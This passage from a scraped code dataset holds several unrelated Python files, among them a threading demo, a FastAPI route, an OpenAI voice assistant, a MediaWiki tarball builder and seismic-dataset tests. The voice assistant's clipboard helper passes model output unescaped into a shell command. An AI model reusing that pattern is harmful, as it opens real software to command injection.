port=5000)\n","repo_name":"tobyjamez/chesspacito","sub_path":"hello_bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20818709619","text":"import threading\n# 定义 个普通的 action 方法,该方法准备作为线程执行体\n\n\ndef action(max1):\n for m in range(max1):\n # 调用 threadi 呵棋块的 cur re 口 t thread ()函��获取当前线程\n # 调用线程对象的 getName ()方法获取当前线程的名字\n print(threading.current_thread().getName() + \"_action_\" + str(m))\n\n\n# 下面是主程序(也就是主线程的线程执行体)\nfor i in range(100):\n # 调用 threading 模块的 current_thread ()函数获取当前线程\n print(threading.current_thread().getName() + \"\" + str(i))\n if i == 20:\n # 创建并启动第一个线程\n t1 = threading.Thread(target=action, args=(100,))\n t1.start()\n # 创建并启动第2个线程\n t2 = threading.Thread(target=action, args=(100,))\n t2.start()\nprint('主线程执行完成!')\n","repo_name":"Carlzkh/CrazyPythonNotes","sub_path":"14/14.2/first_thread.py","file_name":"first_thread.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"14275206693","text":"from dependency_injector.wiring import Provide, inject\nfrom fastapi import APIRouter, Depends\n\nfrom domain.ports.get_order_details_port import OrderDetailsInputPort\nfrom domain.use_cases.get_order_details import GetOrderDetailsByIdUseCase\nfrom frameworks.container import FrameworkContainer\nfrom interface_adapters.dtos.get_order_details_dto import GetOrderDetailsOutputDTO\n\norder_details_route = APIRouter()\n\n\n@order_details_route.get(\n \"/order/details/{order_details_id}\", response_model=GetOrderDetailsOutputDTO\n)\n@inject\nasync def get_order_details(\n order_details_id: int,\n get_order_details_use_case: GetOrderDetailsByIdUseCase = Depends(\n Provide[FrameworkContainer.get_order_details_use_case]\n ),\n) -> GetOrderDetailsOutputDTO:\n \"\"\"Route to create a new table into postgres from a csv file\"\"\"\n try:\n input_port = OrderDetailsInputPort(order_details_id=order_details_id)\n\n output_use_case = await get_order_details_use_case(input_port=input_port)\n\n return GetOrderDetailsOutputDTO(\n order_details_id=output_use_case.order_details_id,\n order_id=output_use_case.order_id,\n pizza_id=output_use_case.pizza_id,\n quantity=output_use_case.quantity,\n )\n except Exception as error:\n return {\"error\": f\"{error}\"}\n","repo_name":"dtleal/gwtk_pizza_place","sub_path":"src/interface_adapters/routes/v1/get_order_details.py","file_name":"get_order_details.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20284690825","text":"from typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n \"\"\"\n 主要注意删除时下标的变化\n 不能继续用下标迭代,因为长度变化了\n\n 1\n 不需要 每次调用 len 自己记录\n\n 2\n 不需要 pre\n\n 3\n 看了答案记录即可\n \"\"\"\n if not nums:\n return 0\n count = 0\n for i in range(1, len(nums)):\n if nums[count] != nums[i]:\n count += 1\n nums[count] = nums[i]\n return count + 1\n\n\nif __name__ == '__main__':\n Solution().removeDuplicates([1, 1, 2])\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/leetcode/0026/0026_3.py","file_name":"0026_3.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"zh","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"}
+{"seq_id":"23176798673","text":"import os \nimport openai \nimport pvporcupine \nimport speech_recognition as sr\nimport struct\nimport pyaudio\nimport time\nimport pvcobra\nimport wave\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nfrom gtts import gTTS \nfrom playsound import playsound\n\nimport yaml\n\nimport sys\nimport psutil\nimport logging\ndef read_yaml():\n with open('config.yaml', \"r\") as f:\n return yaml.safe_load(f)\nconf = read_yaml()\nPICOVOICEKEY = conf['Keys']['picovoice']\naikey = conf['Keys']['openai']\n\nimport subprocess\n\n\ndef copy2clip(txt):\n cmd='echo '+txt.strip()+'|clip'\n return subprocess.check_call(cmd, shell=True)\n\n\n\n\n\ncobra = pvcobra.create(access_key=PICOVOICEKEY)\n\nopenai.api_key = aikey\nvoice_file = \"voice.wav\"\nfilename = voice_file\nchunk = 1024\nFORMAT = pyaudio.paInt16\nchannels = 1\nsample_rate = 44100\np = pyaudio.PyAudio()\nstream = p.open(format=FORMAT,\n channels=channels,\n rate=sample_rate,\n input=True,\n output=True,\n frames_per_buffer=chunk)\nframes = []\n\nporcupine = pvporcupine.create(\n access_key=PICOVOICEKEY,keyword_paths=['Hey-Friday_en_windows_v2_2_0.ppn'],\n keywords=['Hey Jarvis']\n)\n\nr = sr.Recognizer()\n\n\n\nwake_word = 'hey assistant'\npa = pyaudio.PyAudio()\naudio_stream = pa.open(\n rate=porcupine.sample_rate,\n channels=1,\n format=pyaudio.paInt16,\n input=True,\n frames_per_buffer=porcupine.frame_length)\n\nprint(\"Listening for wake word ('{}')...\".format(wake_word))\n\nwhile True:\n pcm = audio_stream.read(porcupine.frame_length)\n pcm = struct.unpack_from(\"h\" * porcupine.frame_length, pcm)\n \n keyword_index = porcupine.process(pcm)\n if keyword_index >= 0:\n stream.start_stream()\n \n \n \n \n \n prompt = None\n\n\n start_time = time.time()\n\n while True:\n pcm = audio_stream.read(cobra.frame_length)\n pcm = struct.unpack_from(\"h\"*cobra.frame_length,pcm)\n voice_probability = cobra.process(pcm)\n\n data = stream.read(chunk)\n frames.append(data)\n\n if voice_probability <= 0.2:\n elapsed_time = time.time() - start_time\n if elapsed_time >= 2.0:\n stream.stop_stream()\n \n \n wf = wave.open(filename, \"wb\")\n wf.setnchannels(channels)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(sample_rate)\n wf.writeframes(b\"\".join(frames))\n \n transcript = ' '\n\n with sr.AudioFile(filename) as source:\n text = None\n try: \n text = r.recognize_google(r.record(source),None,\"en-US\",0,False)\n except TypeError as e:\n transcript = ' say \"sorry i didnt get that\"'\n transcript = text\n print(transcript)\n \n \n \n \n \n if not isinstance(transcript, str):\n transcript = ' say \"sorry i didnt get that\"'\n wf.close()\n \n os.remove('voice.wav')\n prompt = 'your name will be Friday and your job is an AI Voice Assistant, here is your text, ' + transcript \n\n \n break\n\n else:\n start_time = time.time()\n\n\n\n\n \n \n response = openai.Completion.create(\n model=\"text-davinci-003\",prompt=prompt, temperature = 0,n=1)\n if 'choices' in response and len(response['choices']) > 0:\n message = response['choices'][0]['text']\n copy2clip(message)\n\n #\n tts = gTTS(text=message, lang='en', tld='co.za')\n tts.save('generated_message.mp3')\n\n \n audio_file = AudioSegment.from_file('generated_message.mp3',format='mp3')\n \n play(audio_file)\n \n\n \n else:\n print('Failed to generate message using OpenAI GPT-3.5 API.')\n print(\"Listening for wake word ('{}')...\".format(wake_word))\n","repo_name":"Coolcreeper221/Friday","sub_path":"Jarvis.py","file_name":"Jarvis.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"38401835526","text":"import logging\nimport copy\nlogger = None\nimport hashlib\n\ndef setup_logger(args):\n global logger\n if logger == None:\n logger = logging.getLogger()\n else: # wish there was a logger.close()\n for handler in logger.handlers[:]: # make a copy of the list\n logger.removeHandler(handler)\n\n args_copy = copy.deepcopy(args)\n # copy to get a clean hash\n # use the same log file hash if iterations or verbose are different\n # these flags do not change the results\n args_copy.iters = 1\n args_copy.verbose = False\n args_copy.log_interval = 1\n args_copy.seed = 0\n\n log_path = './log/{0}_{1}_{2}.log'.format(args.model, args.density, hashlib.md5(str(args_copy).encode('utf-8')).hexdigest()[:8])\n\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(fmt='%(asctime)s: %(message)s', datefmt='%H:%M:%S')\n\n fh = logging.FileHandler(log_path)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\ndef print_and_log(msg):\n global logger\n print(msg)\n logger.info(msg)\n","repo_name":"JiePKU/MIA-SafeCompress","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"13763232363","text":"from django.urls import path \nfrom . import views\n\napp_name = 'firstapp' #appの名前空間を表す(画面の遷移を指定する場合に用いる)\nurlpatterns={\n path('index/',views.index,name='index'),#/helloでアクセスした場合にviewsファイル内のindex関数を表す\n path('page/',views.user_page,name='user_page'),\n path('number_page//',views.number_page, name = 'number_page'),\n path('home',views.home, name = 'home')\n}","repo_name":"FatherPower/DjangoPractice","sub_path":"firstapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21444449433","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^demo/ajax', views.ajax),\n url(r'^demo/commands/?$', views.test_commands),\n url(r'^demo/services/?$', views.test_services),\n url(r'^demo/pushkin/?$', views.test_pushkin),\n\n url(r'^grep/voip/tau-8/?$', views.grep_voip_config),\n url(r'^ping/(?P[0-9\\.]+)/$', views.ping),\n\n url(r'^disable/interface/?$', views.disable_interface),\n url(r'^enable/interface/?$', views.enable_interface),\n url(r'^ports/status/?$', views.ports_status),\n\n url(r'^$', views.index),\n]\n\n\n\n","repo_name":"ilique/webpushkin","sub_path":"pushkin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33966552769","text":"import re\nfrom itertools import chain\n\nfrom typing import List, Union, Iterable, Generator, Optional, Callable\n\n# ---------- Custom typing ----------\nElementsType = List[Union[int, str]]\n\n\ndef serial_no_generator(lower: int = 0, upper: int = 10, reused: bool = True, values: Iterable[int] = None) -> \\\n Generator[int, None, None]:\n values = values or []\n eset = set(filter(lambda x: lower <= x < upper, values))\n if eset:\n max_val = max(eset)\n if reused:\n gen = chain(range(max_val + 1, upper), range(lower, max_val))\n else:\n gen = range(max_val + 1, upper)\n else:\n gen = range(lower, upper)\n for ele in gen:\n if ele in eset:\n continue\n yield ele\n\n\n_fmt_re = re.compile(r'\\{no(:0(\\d+)([bodxX]))?\\}')\n\nb2p_dict = {'b': 2, 'o': 8, 'd': 10, 'x': 16, 'X': 16}\np2b_dict = {2: 'b', 8: 'o', 10: 'd', 16: 'x'}\n\n\nclass LabelFormatOpts:\n def __init__(self, fmt_str, base=10, digits=2):\n\n base_char = p2b_dict[base]\n data = _fmt_re.findall(fmt_str)\n ft = [item[0] for item in data if item[0] != '']\n if ft:\n if all(el == ft[0] for el in ft):\n base_char = ft[0][-1]\n base, digits = b2p_dict.get(base_char), int(ft[0][2:-1])\n else:\n raise ValueError(f'{fmt_str} Define different formatter for no variable.')\n new_field_fmt = '{{no:0{0}{1}}}'.format(digits, base_char)\n\n self.origin_fmt = fmt_str\n self.normalized_fmt = _fmt_re.sub(new_field_fmt, fmt_str)\n\n fr_dict = {\n 'b': '(?P[01]{{{0}}})'.format(digits),\n 'o': '(?P[0-7]{{{0}}})'.format(digits),\n 'd': '(?P[0-9]{{{0}}})'.format(digits),\n 'x': '(?P[0-9a-f]{{{0}}})'.format(digits),\n 'X': '(?P[0-9A-Z]{{{0}}})'.format(digits),\n }\n\n self.parse_re = re.compile(self.normalized_fmt.replace(new_field_fmt, fr_dict[base_char]))\n self.base = base\n self.digits = digits\n self.base_char = base_char\n\n def value2label(self, value: int) -> str:\n return self.normalized_fmt.format(no=value)\n\n def label2value(self, label: str) -> int:\n m = self.parse_re.match(label)\n if m:\n return int(m.group('no'), base=self.base)\n raise ValueError(f'Error Value {label}')\n\n\nclass SerialElement:\n __slots__ = ['value', 'label']\n\n def __init__(self, value, label):\n self.value = value\n self.label = label\n\n\nclass SerialNoPool:\n def __init__(self, lower: int = None, upper: int = None, base: int = 0, digits: int = 0,\n label_fmt: Optional[str] = None):\n\n if label_fmt is None:\n self._opts = None\n else:\n base = base or 10\n digits = digits or 2\n self._opts = LabelFormatOpts(label_fmt, base, digits)\n base = self._opts.base\n digits = self._opts.digits\n\n if lower is not None and lower < 0:\n raise ValueError(f'lower(={lower}) must be >= 0.')\n if upper is not None and upper <= 0:\n raise ValueError(f'upper(={upper}) must be >= 0.')\n s_set = base and digits\n t_set = lower is not None and upper is not None\n\n if t_set:\n self._lower, self._upper = lower, upper\n if s_set:\n cl, cu = 0, base ** digits\n if not (lower >= cl and upper <= cu):\n raise ValueError(f'The lower-upper [{lower},{upper}) is not in [{cl},{cu})')\n else:\n if s_set:\n self._lower, self._upper = 0, base ** digits\n else:\n self._lower, self._upper = 0, 100\n\n self._values = set()\n self._source = None\n\n # ---------- Pool Attributes ----------\n\n @property\n def lower(self):\n return self._lower\n\n @property\n def upper(self):\n return self._upper\n\n # ---------- Data API ----------\n\n def set_elements(self, elements: ElementsType) -> 'SerialNoPool':\n self._values = set()\n self.add_elements(elements)\n return self\n\n def set_source(self, source: Callable[[], ElementsType]) -> 'SerialNoPool':\n self._source = source\n return self\n\n def add_elements(self, elements: ElementsType) -> 'SerialNoPool':\n values = self._elements2values(elements)\n for v in values:\n self._values.add(v)\n return self\n\n def remove_elements(self, elements: ElementsType) -> 'SerialNoPool':\n values = self._elements2values(elements)\n for v in values:\n self._values.remove(v)\n return self\n\n def _elements2values(self, elements: ElementsType) -> List[int]:\n values = [] # type: List[int]\n for ele in elements:\n if isinstance(ele, int):\n value = ele\n elif isinstance(ele, str):\n value = self._opts.label2value(ele)\n else:\n raise TypeError(f'Invalid element {ele}:unsupported type.')\n if self._lower <= value < self._upper:\n values.append(value)\n else:\n raise ValueError(f'Invalid element {ele}: range error')\n return values\n\n # ---------- Generate API ----------\n\n def get_next_generator(self) -> Generator[SerialElement, None, None]:\n \"\"\"\n This is the low-level method.\n :return:\n \"\"\"\n if self._source is not None:\n elements = self._source()\n self.set_elements(elements)\n value_gen = serial_no_generator(lower=self._lower, upper=self._upper, values=self._values)\n for value in value_gen:\n if self._opts:\n label = self._opts.value2label(value)\n else:\n label = None\n yield SerialElement(value, label)\n\n def generate_values(self, num=1) -> List[int]:\n return [se.value for se in self.get_next_generator()][:num]\n\n def generate_labels(self, num=1) -> List[str]:\n if self._opts is None:\n raise TypeError('The operation generate_labels is not allowed when label_fmt is not set.')\n return [se.label for se in self.get_next_generator()][:num]\n\n def generate(self, num=1) -> List[str]:\n return self.generate_labels(num)\n","repo_name":"kinegratii/borax","sub_path":"borax/counters/serial_pool.py","file_name":"serial_pool.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"32"}
+{"seq_id":"35720542878","text":"#!/usr/bin/env python3\n\"\"\"\nnightly.py - tarball creator\n\nThis is a script that creates tarballs\nfor MediaWiki extensions based on the\nconfiguration in conf.py. It accepts\nsome optional arguments:\n\n* --all: Generate tarballs for all extensions.\n* --skins: Process skins instead of extensions\n* --force: Regenerate all tarballs even if they already exist\n\nBy default, it generates only the tarball for the\nVisualEditor extension (or the Vector skin if\n--skins is passed). This will change in the future\nwhen debugging becomes less rare.\n\"\"\"\n\nimport glob\nimport json\nimport logging\nimport os\nimport random\nimport requests\nimport subprocess\nimport sys\nimport traceback\n\n\nclass TarballGenerator(object):\n def __init__(self, conf, repo_type='extensions', force=False):\n self.API_URL = conf['API_URL']\n self.DIST_PATH = conf['DIST_PATH']\n self.GIT_URL = conf['GIT_URL']\n self.LOG_FILE = conf['LOG_FILE']\n self.SRC_PATH = conf['SRC_PATH']\n self.PID_FILE = conf['PID_FILE']\n self.LOG_FILE = conf['LOG_FILE']\n self.REPO_TYPE = repo_type\n self.EXT_PATH = os.path.join(self.SRC_PATH, self.REPO_TYPE)\n self.COMPOSER = conf.get('COMPOSER')\n self._repo_list = None\n self._extension_config = None\n self.force = force\n self.session = requests.Session()\n\n @property\n def repo_list(self):\n \"\"\"\n Lazy-load the list of all extensions\n \"\"\"\n if self._repo_list is None:\n self._repo_list = self.fetch_all_repos()\n return self._repo_list\n\n def fetch_all_repos(self):\n \"\"\"\n Does an API request to get the complete list of extensions.\n Do not call directly.\n \"\"\"\n logging.debug('Fetching list of all %s...' % self.REPO_TYPE)\n data = {\n 'action': 'query',\n 'list': 'extdistrepos',\n 'format': 'json'\n }\n r = self.session.get(self.API_URL, params=data)\n r.raise_for_status()\n return r.json()['query']['extdistrepos'][self.REPO_TYPE]\n\n @property\n def supported_versions(self):\n \"\"\"\n Lazy-load the list of supported branches\n \"\"\"\n if self._extension_config is None:\n self.fetch_extension_config()\n return self._extension_config['snapshots']\n\n def fetch_extension_config(self):\n \"\"\"\n Fetch the ExtensionDistributor configuration from the API\n Do not call this directly.\n \"\"\"\n logging.debug('Fetching ExtensionDistributor config from API...')\n data = {\n 'action': 'query',\n 'meta': 'siteinfo',\n 'format': 'json',\n }\n r = self.session.get(self.API_URL, params=data)\n r.raise_for_status()\n resp = r.json()\n self._extension_config = resp['query']['general']['extensiondistributor']\n\n return {\n 'versions': resp['query']['general']['extensiondistributor']['snapshots'],\n 'extension-list': resp['query']['general']['extensiondistributor']['list']\n }\n\n def init(self):\n \"\"\"\n Does basic initialization\n \"\"\"\n # Set up logging\n logging.basicConfig(\n filename=self.LOG_FILE,\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s:%(message)s'\n )\n\n # Check to make sure nightly.py isn't already running\n if os.path.exists(self.PID_FILE):\n with open(self.PID_FILE, 'r') as f:\n old_pid = f.read()\n\n if self.check_pid(int(old_pid)):\n logging.warning('Another process of nightly.py is still running, quitting this one')\n quit()\n\n self.create_pid_file()\n\n # Init some directories we'll need\n if not os.path.isdir(self.EXT_PATH):\n self.shell_exec(['mkdir', '-p', self.EXT_PATH])\n if not os.path.isdir(self.DIST_PATH):\n self.shell_exec(['mkdir', '-p', self.DIST_PATH])\n\n def shell_exec(self, args, **kwargs):\n \"\"\"\n Shortcut wrapper to execute a shell command\n\n >>> self.shell_exec(['ls', '-l'])\n \"\"\"\n return subprocess.check_output(args, **kwargs).decode()\n\n def update_extension(self, ext):\n \"\"\"\n Fetch an extension's updates, and\n create new tarballs if needed\n \"\"\"\n full_path = os.path.join(self.EXT_PATH, ext)\n logging.info('Starting update for %s' % ext)\n repo_url = self.GIT_URL % ext\n if not os.path.exists(full_path):\n os.chdir(self.EXT_PATH)\n logging.debug('Cloning %s' % ext)\n self.shell_exec(['git', 'clone', repo_url, ext])\n pass\n for branch in self.supported_versions:\n os.chdir(full_path)\n logging.info('Creating %s for %s' % (branch, ext))\n # In case GIT_URL has changed\n self.shell_exec(['git', 'remote', 'set-url', 'origin', repo_url])\n # Update remotes\n self.shell_exec(['git', 'fetch'])\n try:\n # Could fail if repo is empty\n self.shell_exec(['git', 'reset', '--hard', 'origin/master'])\n # Reset everything!\n self.shell_exec(['git', 'clean', '-ffdx'])\n # Checkout the branch\n self.shell_exec(['git', 'checkout', 'origin/%s' % branch])\n except subprocess.CalledProcessError:\n # Just a warning because this is expected for some extensions\n logging.warning('could not checkout origin/%s' % branch)\n continue\n # Reset everything, again.\n self.shell_exec(['git', 'clean', '-ffd'])\n # Sync submodules in case their urls have changed\n self.shell_exec(['git', 'submodule', 'sync'])\n # Update them, initializing new ones if needed\n self.shell_exec(['git', 'submodule', 'update', '--init'])\n # Gets short hash of HEAD\n rev = self.shell_exec(['git', 'rev-parse', '--short=7', 'HEAD']).strip()\n tarball_fname = '%s-%s-%s.tar.gz' % (ext, branch, rev)\n if not self.force and os.path.exists(os.path.join(self.DIST_PATH, tarball_fname)):\n logging.debug('No updates to branch, tarball already exists.')\n continue\n if self.COMPOSER and os.path.exists('composer.json'):\n with open('composer.json') as f_composer:\n d_composer = json.load(f_composer)\n if 'require' in d_composer:\n logging.debug('Running composer install for %s' % ext)\n try:\n self.shell_exec([self.COMPOSER, 'install', '--no-dev', '--ignore-platform-reqs'])\n except subprocess.CalledProcessError:\n logging.error(traceback.format_exc())\n logging.error('composer install failed')\n # Create gitinfo.json to be read/displayed by Special:Version\n git_info = {}\n with open('.git/HEAD') as f_head:\n head = f_head.read()\n if head.startswith('ref:'):\n head = head[5:] # Strip 'ref :'\n git_info['head'] = head\n # Get the SHA-1\n git_info['headSHA1'] = self.shell_exec(['git', 'rev-parse', 'HEAD'])\n git_info['headCommitDate'] = self.shell_exec(['git', 'show', '-s', '--format=format:%ct', 'HEAD'])\n if head.startswith('refs/heads'):\n gi_branch = head.split('/')[-1]\n else:\n gi_branch = head\n git_info['branch'] = gi_branch\n git_info['remoteURL'] = self.GIT_URL % ext\n with open('gitinfo.json', 'w') as f:\n json.dump(git_info, f)\n\n # TODO: Stop writing this file now that we have gitinfo.json\n # Create a 'version' file with basic info about the tarball\n with open('version', 'w') as f:\n f.write('%s: %s\\n' % (ext, branch))\n f.write(self.shell_exec(['date', '+%Y-%m-%dT%H:%M:%S']) + '\\n') # TODO: Do this in python\n f.write(rev + '\\n')\n old_tarballs = glob.glob(os.path.join(self.DIST_PATH, '%s-%s-*.tar.gz' % (ext, branch)))\n logging.debug('Deleting old tarballs...')\n for old in old_tarballs:\n # FIXME: Race condition, we should probably do this later on...\n os.unlink(old)\n os.chdir(self.EXT_PATH)\n # Finally, create the new tarball\n self.shell_exec(['tar', '--exclude', '.git', '-czhPf', tarball_fname, ext])\n logging.debug('Moving new tarballs into dist/')\n tarballs = glob.glob(os.path.join(self.EXT_PATH, '*.tar.gz'))\n for tar in tarballs:\n fname = tar.split('/')[-1]\n os.rename(tar, os.path.join(self.DIST_PATH, fname))\n logging.info('Finished update for %s' % ext)\n\n if random.randint(0, 99) == 0:\n # Run git gc every 100th process (statistically)\n self.shell_exec(['git', 'gc'], cwd=full_path)\n\n def check_pid(self, pid):\n \"\"\"\n Checks whether the given pid is running\n \"\"\"\n try:\n # This doesn't actually kill it, just checks if it is running\n os.kill(pid, 0)\n except OSError:\n # Not running\n return False\n else:\n # So it must be running\n return True\n\n def create_pid_file(self):\n \"\"\"\n Creates a pid file with the current pid\n \"\"\"\n with open(self.PID_FILE, 'w') as f:\n f.write(str(os.getpid()))\n logging.info('Creating pid file')\n\n def run(self, repos=None):\n self.init()\n if not repos:\n repos = self.repo_list\n logging.info('Processing %s %s' % (len(repos), self.REPO_TYPE))\n logging.info('Starting update of all %s...' % self.REPO_TYPE)\n for repo in repos:\n try:\n self.update_extension(repo)\n except KeyboardInterrupt:\n logging.error(traceback.format_exc())\n sys.exit(1)\n except Exception:\n logging.error(traceback.format_exc())\n logging.error('Updating %s failed, skipping' % repo)\n logging.info('Finished update of all %s!' % self.REPO_TYPE)\n\n\ndef main():\n # Load our config from JSON\n conf = None\n skins = '--skins' in sys.argv\n etc_path = '/etc/skindist.conf' if skins else '/etc/extdist.conf'\n local_fname = 'skinconf.json' if skins else 'conf.json'\n if os.path.exists(etc_path):\n with open(etc_path, 'r') as f:\n conf = json.load(f)\n elif os.path.exists(os.path.join(os.path.dirname(__file__), local_fname)):\n with open(os.path.join(os.path.dirname(__file__), local_fname), 'r') as f:\n conf = json.load(f)\n else:\n print('extdist is not configured properly.')\n quit()\n if '--all' in sys.argv:\n repos = []\n elif skins:\n repos = ['Vector']\n else:\n repos = ['VisualEditor']\n for arg in sys.argv:\n if arg.startswith('--repo'):\n repos.append(arg.split('=', 1)[1])\n repo_type = 'skins' if skins else 'extensions'\n force = '--force' in sys.argv\n generator = TarballGenerator(conf, repo_type=repo_type, force=force)\n generator.run(repos=repos)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wikimedia/labs-tools-extdist","sub_path":"nightly.py","file_name":"nightly.py","file_ext":"py","file_size_in_byte":11493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"43285861310","text":"import time\n\nimport numpy as np\nfrom constants import LEVEL2, ACTIONS, GameStatus\nfrom Level import Level\nfrom WYB import WatchYourBack\nfrom map_utilities import clear_console_output, encode_map_numeric, print_map\nfrom dql import DQNAgent\n\ngame = WatchYourBack(Level(LEVEL2))\nstate_size = len(LEVEL2)**2\nagent = DQNAgent(state_size, 4)\nagent.epsilon = 0\nagent.load(\"./save/level2.h5\")\n\nclear_console_output()\nprint_map(game.level.level)\ntime.sleep(2)\n\nwhile game.status == GameStatus.ONGOING:\n state = encode_map_numeric(game.level.level)\n player_move = agent.act(np.reshape(state, [1, state_size]))\n\n game.move_player(ACTIONS[player_move])\n clear_console_output()\n print_map(game.level.level)\n time.sleep(2)\n\n game.move_enemies()\n clear_console_output()\n print_map(game.level.level)\n time.sleep(2)\n\nprint('Result:', game.status)","repo_name":"yortuc/backGame","sub_path":"trainer/dql_play.py","file_name":"dql_play.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"5303542727","text":"import numpy as np\n\nimport pytest\n\nfrom hypothesis import given, assume, settings\nfrom hypothesis.strategies import integers, text, floats, tuples, sampled_from\nfrom hypothesis.extra.numpy import arrays\n\nfrom segysak._seismic_dataset import (\n _check_vert_units,\n _check_input,\n _dataset_coordinate_helper,\n)\nfrom segysak._seismic_dataset import (\n create_seismic_dataset,\n create2d_dataset,\n create3d_dataset,\n)\n\nfrom segysak._keyfield import VerticalUnits, VerticalKeyField\n\n\nclass TestCheckers:\n \"\"\"\n Test data checking utilities\n \"\"\"\n\n def test_check_input_does_nothing_to_None(self):\n assert _check_input(None) is None\n\n @given(integers(0, 100000))\n def test_check_input_turns_int_into_array(self, i):\n assert len(_check_input(i)) == i\n\n def test_check_input_converts_to_array(self):\n assert isinstance(_check_input([0, 0]), np.ndarray)\n\n def test_check_input_raises_error_at_multidimensions(self):\n with pytest.raises(ValueError):\n _check_input([[0, 0]])\n\n @pytest.mark.parametrize(\"u\", list(VerticalUnits))\n def test_vertical_units_pass_checking(self, u):\n assert _check_vert_units(u) == u\n\n @given(text())\n def test_illegal_vertical_units_raise_errors(self, t):\n assume(t not in list(VerticalUnits))\n with pytest.raises(ValueError):\n _check_vert_units(t)\n\n @pytest.mark.parametrize(\"p\", list(VerticalKeyField.values()))\n def test_domains_pass_checking(self, p):\n _, domain = _dataset_coordinate_helper(None, p)\n assert p == domain\n\n @given(text())\n def test_illegal_domain_raise_errors(self, t):\n assume(t not in list(VerticalKeyField.values()))\n with pytest.raises(ValueError):\n _dataset_coordinate_helper(None, t)\n\n\nclass TestCreateSeismicDataset:\n \"\"\"\n Test creating a seismic dataset with various dimensions and sizes\n \"\"\"\n\n @given(integers(0, 10000), integers(0, 100000))\n def test_create_2D_seismic_dataset_with_integers(self, s, t):\n dataset = create_seismic_dataset(\n twt=s, depth=None, cdp=t, iline=None, xline=None, offset=None\n )\n assert len(dataset.dims) == 2\n assert dataset.dims[\"twt\"] == s\n\n @given(integers(0, 45))\n @settings(max_examples=10)\n def test_create_2D_seismic_dataset_with_offsets(self, o):\n dataset = create_seismic_dataset(\n twt=100, depth=None, cdp=1000, iline=None, xline=None, offset=o\n )\n assert len(dataset.dims) == 3\n\n @given(integers(0, 10000), integers(0, 100000), integers(0, 100000))\n def test_create_3D_seismic_dataset_with_integers(self, s, i, x):\n dataset = create_seismic_dataset(\n twt=None, depth=s, cdp=None, iline=i, xline=x, offset=None\n )\n assert len(dataset.dims) == 3\n assert dataset.dims[\"depth\"] == s\n\n @given(\n arrays(float, shape=integers(0, 10000), elements=floats(-1000, 1000)),\n integers(0, 10000),\n )\n def test_create_2D_seismic_dataset_with_arrays(self, a, t):\n dataset = create_seismic_dataset(\n twt=a, depth=None, cdp=t, iline=None, xline=None, offset=None\n )\n assert len(dataset.dims) == 2\n assert dataset.dims[\"twt\"] == len(a)\n\n @given(integers(0, 100))\n @settings(max_examples=10)\n def test_create_2D_seismic_dataset_with_multiple_dimensions(self, d):\n dims = {str(i): i for i in range(d)}\n dataset = create_seismic_dataset(\n twt=100, depth=None, cdp=1000, iline=None, xline=None, offset=None, **dims\n )\n assert len(dataset.dims) == d + 2\n\n def test_mutally_not_allowed_arguments(self):\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, iline=100, xline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, iline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, xline=100)\n\n def test_mutually_required_arguments(self):\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(iline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(xline=100)\n\n\nclass TestCreate2DDataset:\n \"\"\"\n Test creating 2D datasets with various shapes\n \"\"\"\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100))\n def test_create_2D_dataset_custom_sampling(self, s, f, r):\n dataset = create2d_dataset(\n dims=(100, s), first_sample=f, sample_rate=r, vert_domain=\"TWT\"\n )\n assert dataset.twt.data.max() == f + s * r - r\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100))\n def test_create_2D_dataset_custom_cdp(self, t, f, s):\n dataset = create2d_dataset(dims=(t, 100), first_cdp=f, cdp_step=s)\n assert dataset.cdp.data.max() == f + s * t - s\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100), integers(0, 50))\n def test_create_2D_dataset_wfirstoffset(self, s, f, r, o):\n dataset = create2d_dataset(\n dims=(100, s, 5),\n first_cdp=f,\n cdp_step=s,\n sample_rate=r,\n first_offset=o,\n offset_step=10,\n )\n assert dataset.offset.data.max() == 4 * 10 + o\n\n\nclass TestCreate3DDataset:\n \"\"\"\n Test creating 3D datasets with various shapes\n \"\"\"\n\n @given(\n tuples(integers(1, 10000), 